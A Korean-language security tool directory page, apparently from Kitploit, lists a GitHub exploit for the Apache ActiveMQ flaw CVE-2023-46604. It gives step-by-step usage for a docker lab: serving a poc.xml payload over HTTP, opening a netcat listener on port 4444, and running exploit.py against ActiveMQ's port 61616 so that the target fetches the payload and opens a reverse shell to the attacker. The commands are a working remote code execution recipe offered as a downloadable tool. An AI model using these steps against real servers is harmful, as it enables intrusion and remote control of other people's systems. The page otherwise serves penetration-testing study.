Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-46604 — CVE-2023-46604의 Apache ActiveMQ 익스플로잇으로, 조작된 XML 페이로드를 통한 원격 코드 실행과 리버스 셸 구축을 가능하게 합니다. | Kitploit
도구/GitHubGitHub/ccievoice2009/cve-2023-46604
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubccievoice2009/cve-2023-46604

CVE-2023-46604

CVE-2023-46604의 Apache ActiveMQ 익스플로잇으로, 조작된 XML 페이로드를 통한 원격 코드 실행과 리버스 셸 구축을 가능하게 합니다.

저장소 보기
361년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-46604

image

요구 환경에 따라 피해자 머신과 대상 머신으로 구성된 2개의 이미지를 포함하는 docker-compose를 구축합니다. 피해자 머신에서 ActiveMQ를 시작합니다.

공격자 머신으로 전환합니다: • HTTP 서비스를 열어 poc를 전송합니다: python3 -m http.server

• netcat을 사용하여 공격자 머신으로의 연결을 수신 대기합니다: nc -nlvp 4444

• 공격자 머신으로 리버스 셸 연결을 생성하는 payload를 전송합니다: python3 exploit.py -i 172.18.0.3 -p 61616 --xml http://172.18.0.2:8000/poc.xml 여기서:

  • Exploit.py: 취약점을 악용하는 코드 파일
  • -I 172.18.0.3: payload를 전송하는 머신의 IP 주소
  • -p 61616: 피해자 머신의 ActiveMQ가 수신 대기 중인 포트
  • --xml http://172.18.0.2:8000/poc.xml: 공격자 머신에 있는 poc.xml 파일의 URL 주소

볼 수 있듯이, 'exploit.py' 파일을 실행하는 명령어를 호출한 후, 악용 코드는 웹 서버에 있는 'poc.xml' 패킷을 대상 서버에서 실행 중인 ActiveMQ 서비스의 주소로 전송합니다. 동시에 공격자 머신의 HTTP 웹 서버는 대상 머신의 IP 주소로부터 전송된 요청을 수신합니다.

payload 전송을 수행한 후, 공격자 머신의 포트 4444에서 수신 대기 중인 터미널로 전환합니다. 피해자 머신의 리버스 셸이 전송된 것을 확인할 수 있습니다.

도구 다운로드